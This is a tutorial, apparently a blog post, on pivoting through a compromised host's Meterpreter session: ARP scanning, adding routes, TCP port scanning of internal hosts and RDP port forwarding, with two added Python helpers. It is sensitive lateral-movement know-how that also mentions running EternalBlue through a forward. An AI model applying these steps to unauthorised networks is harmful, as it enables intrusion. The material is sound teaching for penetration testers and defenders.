Scanning and Port Forwarding through a Meterpreter Session

Once you have compromised a system and hold a Meterpreter session on it, the next goal is to learn about the environment that system sits in. All of the scanning and port forwarding below runs through that Meterpreter session, so the compromised system becomes the pivot into networks the attacking machine cannot reach directly.

Find The IP Address

First, find out which IP addresses the compromised system has. Run ipconfig from within the Meterpreter session; it lists every network adapter and the addresses bound to it, which tells you which subnets the host can reach directly.

meterpreter > ipconfig

Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 2
============
Name : HP Network Team Uplink
Hardware MAC : ac:16:2d:8b:65:30
MTU : 1500
IPv4 Address : 10.0.0.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::69df:8883:3772:d46c
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 3
============
Name : HP Network Team NAS Network
Hardware MAC : ac:16:2d:8b:65:32
MTU : 1500
IPv4 Address : 192.168.2.1
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::8d75:bc52:3792:764f
IPv6 Netmask : ffff:ffff:ffff:ffff::

Scanning hosts

The system is connected to two different IP ranges (10.0.0.0/24 on Interface 2 and 192.168.2.0/24 on Interface 3), which could mean more targets to exploit. Next we need to find out which other addresses in those ranges are in use. To do this we can use the Meterpreter script arp_scanner, which performs an ARP sweep of a given range from the compromised host, so it finds hosts on the same layer-2 segment even when they filter ICMP. (Meterpreter scripts are deprecated in current Metasploit; the post module post/windows/gather/arp_scanner does the same job from msfconsole.)

meterpreter > run arp_scanner -r 10.0.0.1/24
 [*] ARP Scanning 10.0.0.1/24
 [*] IP: 10.0.0.5 MAC 28:92:4a:37:39:26
 [*] IP: 10.0.0.7 MAC 88:51:fb:ae:12:60
 [*] IP: 10.0.0.130 MAC 3c:d9:2b:59:77:11
 [*] IP: 10.0.0.134 MAC e0:69:95:c0:ac:bd
 [*] IP: 10.0.0.132 MAC 6c:8f:b5:92:ae:68
 [*] IP: 10.0.0.138 MAC 00:80:92:f6:5b:93
 [*] IP: 10.0.0.139 MAC 48:ba:4e:38:ce:35
 [*] IP: 10.0.0.145 MAC 2c:44:fd:03:18:18
 [*] IP: 10.0.0.144 MAC 24:a4:3c:de:05:8a
 [*] IP: 10.0.0.147 MAC 00:11:32:6e:4d:8d
 [*] IP: 10.0.0.200 MAC 00:1f:33:7b:b9:2d
 [*] IP: 10.0.0.203 MAC 00:50:56:8e:1f:e6
 [*] IP: 10.0.0.205 MAC 00:15:5d:18:2b:01
 [*] IP: 10.0.0.210 MAC 68:b5:99:79:62:ac
 [*] IP: 10.0.0.211 MAC 68:b5:99:71:a7:56
 [*] IP: 10.0.0.213 MAC 68:b5:99:71:a7:5e
 [*] IP: 10.0.0.215 MAC 68:b5:99:79:62:b4
 [*] IP: 10.0.0.229 MAC 00:c0:b7:59:de:78
 [*] IP: 10.0.0.251 MAC 00:1d:aa:bb:f8:98
 [*] IP: 10.0.0.255 MAC ac:16:2d:8b:65:30
meterpreter > run arp_scanner -r 192.168.2.1/24
[*] ARP Scanning 192.168.2.1/24
[*] IP: 192.168.2.1 MAC ac:16:2d:8b:65:32
[*] IP: 192.168.2.255 MAC ac:16:2d:8b:65:32

Here we used the -r option to give the address range to scan, in this case 10.0.0.1/24 and 192.168.2.1/24. Note that the entries for 10.0.0.255 and 192.168.2.255 carry the pivot's own MAC addresses: those are the subnet broadcast addresses being answered by the pivot itself, not live hosts, and 192.168.2.1 is the pivot's own address, so the second range produced no new targets. The other options are listed below, or type run arp_scanner -h.

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARP Scan Discovery.
OPTIONS:
-h Help menu.
-i Enumerate Local Interfaces
-r <opt> The target address range or CIDR identifier
-s Save found IP Addresses to logs.

The ARP scan has given us a list of potential targets. Before Metasploit modules can reach them, we need to add routes for the discovered subnets through our Meterpreter session. This is done with the route add command in msfconsole, so background the Meterpreter session first.

meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > route add 10.0.0.1 255.255.255.0 1
[*] Route added
msf exploit(multi/handler) > route add 192.168.2.1 255.255.255.0 1
[*] Route added
msf exploit(multi/handler) > route print

IPv4 Active Routing Table
=========================

   Subnet       Netmask          Gateway
   ------       -------          -------
   10.0.0.1     255.255.255.0    Session 1
   192.168.2.1  255.255.255.0    Session 1

[*] There are currently no IPv6 routes defined.

Notice the number 1 at the end of each route add command. It is the ID of the Meterpreter session that traffic for that subnet will be sent through, and it must be the session that actually has an interface on that subnet (check with sessions -l). When you hold several sessions on several networks it is important to keep the session IDs and subnets straight. The commands above pass a host address (10.0.0.1) as the subnet; Metasploit accepts this, but the network address is the conventional form, and current versions also accept CIDR notation, for example route add 10.0.0.0/24 1. The post module post/multi/manage/autoroute adds the same routes automatically from the session's own interfaces.
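The two transcripts above (ipconfig and arp_scanner) contain everything needed to write the route add lines and the target list for the port scanner that follows, and a small script avoids the two mistakes that are easy to make by hand: routing a host address instead of the network, and treating the pivot's own addresses or the broadcast replies as targets. The following is an added example for this tutorial, not part of Metasploit; the embedded transcripts are constructed from a subset of the output shown on this page, and the session ID is assumed to be 1 as above.

```python
"""Turn Meterpreter 'ipconfig' and 'run arp_scanner' output into msfconsole
'route add' lines and the RHOSTS list for scanning through the pivot.

Added example for this tutorial; not part of Metasploit. The transcripts
below are constructed from a subset of the output shown on the page."""
import ipaddress
import re

# Constructed sample: trimmed copy of the page's ipconfig output.
IPCONFIG_SAMPLE = """
Interface 1
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 2
Name : HP Network Team Uplink
Hardware MAC : ac:16:2d:8b:65:30
IPv4 Address : 10.0.0.10
IPv4 Netmask : 255.255.255.0

Interface 3
Name : HP Network Team NAS Network
Hardware MAC : ac:16:2d:8b:65:32
IPv4 Address : 192.168.2.1
IPv4 Netmask : 255.255.255.0
"""

# Constructed sample: a few lines of the page's arp_scanner output.
ARP_SAMPLE = """
[*] ARP Scanning 10.0.0.1/24
[*] IP: 10.0.0.5 MAC 28:92:4a:37:39:26
[*] IP: 10.0.0.7 MAC 88:51:fb:ae:12:60
[*] IP: 10.0.0.130 MAC 3c:d9:2b:59:77:11
[*] IP: 10.0.0.255 MAC ac:16:2d:8b:65:30
[*] ARP Scanning 192.168.2.1/24
[*] IP: 192.168.2.1 MAC ac:16:2d:8b:65:32
[*] IP: 192.168.2.255 MAC ac:16:2d:8b:65:32
"""


def parse_ipconfig(text):
    """Return [(mac, IPv4Interface)] for every non-loopback IPv4 interface."""
    ifaces, mac, addr = [], None, None
    for line in text.splitlines():
        key, _, value = (part.strip() for part in line.partition(":"))
        if key == "Hardware MAC":
            mac = value.lower()
        elif key == "IPv4 Address":
            addr = value
        elif key == "IPv4 Netmask" and addr:
            iface = ipaddress.IPv4Interface(f"{addr}/{value}")  # dotted mask ok
            if not iface.ip.is_loopback:
                ifaces.append((mac, iface))
            addr = None
    return ifaces


def pivot_networks(ifaces):
    """Subnets the pivot sits on, with host bits cleared (10.0.0.0/24, ...)."""
    return sorted({iface.network for _, iface in ifaces})


def route_commands(ifaces, session_id):
    """msfconsole lines routing each subnet through the Meterpreter session."""
    return [f"route add {n.network_address} {n.netmask} {session_id}"
            for n in pivot_networks(ifaces)]


def parse_arp_scan(text):
    """Return {IPv4Address: mac} from arp_scanner output."""
    pattern = r"IP:\s*(\d+\.\d+\.\d+\.\d+)\s+MAC\s+([0-9a-fA-F:]+)"
    return {ipaddress.IPv4Address(ip): mac.lower()
            for ip, mac in re.findall(pattern, text)}


def live_targets(arp_hosts, ifaces):
    """Drop the pivot itself and the network/broadcast addresses.

    arp_scanner lists the broadcast address with the pivot's own MAC (the
    pivot answers for it), so both the address and the MAC are checked."""
    pivot_macs = {mac for mac, _ in ifaces}
    skip = set()
    for _, iface in ifaces:
        skip.update({iface.ip, iface.network.network_address,
                     iface.network.broadcast_address})
    return sorted(ip for ip, mac in arp_hosts.items()
                  if ip not in skip and mac not in pivot_macs)


def rhosts_line(targets):
    """RHOSTS accepts a space-separated list of hosts or ranges."""
    return "set RHOSTS " + " ".join(str(t) for t in targets)


if __name__ == "__main__":
    ifaces = parse_ipconfig(IPCONFIG_SAMPLE)
    for cmd in route_commands(ifaces, 1):
        print(cmd)
    print(rhosts_line(live_targets(parse_arp_scan(ARP_SAMPLE), ifaces)))
```

Run against the full arp_scanner output from the page, the same filter leaves the 19 real 10.0.0.x hosts and nothing on 192.168.2.0/24, which matches what the two scans actually showed.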

Next, we need a port scanner to find open ports on the hosts listed by the ARP scan. Load the TCP port scanner from the auxiliary scanner modules and point it at the addresses the ARP scan returned; because the routes are now in place, its connections leave through the Meterpreter session rather than the attacking machine's own interface.

msf exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.0.5
RHOSTS => 10.0.0.5
msf auxiliary(scanner/portscan/tcp) > set PORTS 1-1024
PORTS => 1-1024

Here RHOSTS is the host to scan (a space-separated list of hosts or a CIDR range is also accepted) and PORTS is the port range we want to scan (1-1024). To see the other options type show options.

msf auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.0.0.5         yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

Then we type run and the results are listed.

msf auxiliary(scanner/portscan/tcp) > run

[+] 10.0.0.5: - 10.0.0.5:22 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:80 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:443 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

To scan another host, set RHOSTS to one of the other addresses found by the ARP scan at the beginning of this tutorial and re-run the scanner. To cover several hosts in one run, give them all to RHOSTS and raise THREADS so they are scanned in parallel.

msf auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.0.7
RHOSTS => 10.0.0.7
msf auxiliary(scanner/portscan/tcp) > run

[+] 10.0.0.7: - 10.0.0.7:80 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

There are five port scanner modules under auxiliary/scanner/portscan: ack, syn, tcp, xmas and ftpbounce. Only tcp works through a Meterpreter pivot. It performs full TCP connects, which Metasploit can relay through the session, whereas the SYN, ACK and XMAS scanners craft raw packets and need a raw socket on the attacking machine, and raw packets are not routed through the tunnel. The same limitation applies if you expose the pivot to external tools with auxiliary/server/socks_proxy: only TCP connect traffic traverses it, so for nmap use -sT and add -Pn, since ICMP host discovery will not get through either.

Port Forwarding

Lastly, any port you find open in the steps above can be forwarded to your local machine, much like a local forward over an SSH tunnel. Check out my SSH tutorial here.

Say you find a host with port 3389 open, the standard RDP port on Windows PCs and servers. Normally you could not Remote Desktop to it directly because an external firewall blocks the way in. With a Meterpreter session on a host inside the network you can forward that port to your local machine over the already established session and then point an RDP client at localhost; the connection rides the tunnel and the external firewall never sees an inbound RDP attempt. This is not limited to 3389: you could just as easily forward port 80 on a router to reach its login page and attack it with local tools, or 445 and run the EternalBlue exploit against it. Note that Metasploit's own modules do not need portfwd once the routes from the previous section exist; portfwd is for tools that run outside Metasploit, such as an RDP client or a browser.

If you have been following along, get back into your established Meterpreter session with sessions -i 1. Then type portfwd -h to see all the portfwd options.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.

As the options show, a forward is created with portfwd add, using -l for the local port to listen on, -p for the remote port to connect to and -r for the remote host. -L sets the local address the listener binds to; it defaults to 0.0.0.0, so unless you add -L 127.0.0.1 anyone who can reach your machine can use the tunnel as well.

So your command should look something like this…

meterpreter > portfwd add -l 3389 -p 3389 -r 10.0.0.10
[*] Local TCP relay created: :3389 <-> 10.0.0.10:3389

Now you have created your first port forward; list your active forwards with the portfwd list command. (In this example -r points at 10.0.0.10, which ipconfig showed to be the pivot host itself; to reach another internal host, give its address to -r instead.)


meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local         Remote          Direction
   -----  -----         ------          ---------
   1      0.0.0.0:3389  10.0.0.10:3389  Forward

1 total active port forwards.


Now you can point any Remote Desktop client at 127.0.0.1 port 3389. The connection is tunnelled through your Meterpreter session to the host you specified by IP address with -r inside the network.

(Screenshot: RDP client connecting to localhost)


If for any reason you need to drop all your active port forwards, use portfwd flush. This clears the list and tears down every open relay at once. To remove a single entry instead, use portfwd delete -i with the index shown by portfwd list.

meterpreter > portfwd flush
[*] Successfully stopped TCP relay on 0.0.0.0:3389
[*] Successfully flushed 1 rules
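What portfwd sets up is a local TCP relay: a listener on the attacking machine that, for every client connection, opens a connection to the target and copies bytes in both directions, which is why an ordinary RDP client can use it without knowing about Meterpreter. The following is an added example written for this tutorial, not Metasploit code. It reimplements that relay in plain Python so the mechanism, including the bind-address choice behind the 0.0.0.0:3389 line in portfwd list, can be seen and run offline; the real portfwd opens the target-side leg from the compromised host over the Meterpreter channel, whereas here both legs are local sockets, and the echo server is a constructed stand-in for the internal host.

```python
"""A minimal local TCP relay of the kind 'portfwd add -l <lport> -p <rport>
-r <rhost>' creates: listen on the attacker box and, for each client that
connects, open a connection to the target and pump bytes both ways.

Added example for this tutorial, not Metasploit code. Real portfwd opens
the target-side connection from the compromised host over the Meterpreter
channel; here both legs are ordinary local sockets so the relay can be
exercised offline against a constructed echo server standing in for the
internal RDP host."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    EOF propagates through the relay to the other end."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class LocalRelay:
    """Local listener relaying to (rhost, rport), like a Forward portfwd.

    bind defaults to loopback here. portfwd defaults to 0.0.0.0 (hence
    'Local 0.0.0.0:3389' in portfwd list), which lets any host that can
    reach the attacker box ride the tunnel; -L 127.0.0.1 avoids that."""

    def __init__(self, rhost, rport, lport=0, bind="127.0.0.1"):
        self.target = (rhost, rport)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind, lport))  # lport=0 picks a free port
        self.listener.listen(5)
        self.lport = self.listener.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:
                return  # listener closed: relay stopped (cf. portfwd flush)
            try:
                remote = socket.create_connection(self.target, timeout=5)
            except OSError:
                client.close()  # target unreachable: drop this client
                continue
            remote.settimeout(None)
            threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
            threading.Thread(target=_pump, args=(remote, client), daemon=True).start()

    def close(self):
        self.listener.close()


def start_echo_server():
    """Constructed stand-in for the internal service behind the pivot."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def relay_roundtrip(payload):
    """Send payload to the relay's local port and return what the echo
    server on the far side sends back through it."""
    echo = start_echo_server()
    relay = LocalRelay("127.0.0.1", echo.getsockname()[1])
    try:
        with socket.create_connection(("127.0.0.1", relay.lport), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # done sending; EOF travels through
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    print(relay_roundtrip(b"hello through the relay"))
```

The half-close handling in _pump is what makes protocols that rely on EOF work through the relay; a relay that simply closes both sockets when one side finishes sending would cut off replies still in flight.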


Reference

The links below helped me create this tutorial and contain some great extra reading.

https://www.offensive-security.com/metasploit-unleashed/portfwd/

https://netsec.ws

https://www.sans.org/reading-room/whitepapers/testing/post-exploitation-metasploit-pivot-port-33909

As always, please give any feedback about this tutorial in the comments below. I read every comment not flagged as spam. Also let me know any areas you would like me to cover in future tutorials.
